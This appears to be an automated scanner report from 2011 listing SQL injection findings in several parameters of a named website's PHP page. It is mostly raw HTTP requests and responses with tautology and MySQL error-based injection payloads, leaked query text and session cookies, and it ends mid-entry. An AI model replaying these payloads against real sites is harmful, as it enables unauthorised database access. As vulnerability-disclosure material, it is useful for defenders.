GET /ppc/leadflow/hins00/leadflow/hins00/project.php'?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow/hins00/project.php''?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns'&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns''&iusrc=3 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.0 404 Not Found Date: Fri, 25 Mar 2011 19:16:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 122 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/leadflow/hins00/project.php was not found on this server.</p>
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2923 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/' unio' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3'' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1'=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:18:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2963 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... oject_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5
Request 2
GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1''=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:18:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5063 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4888 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5063 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4888 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:21:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5063 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:21:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4888 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
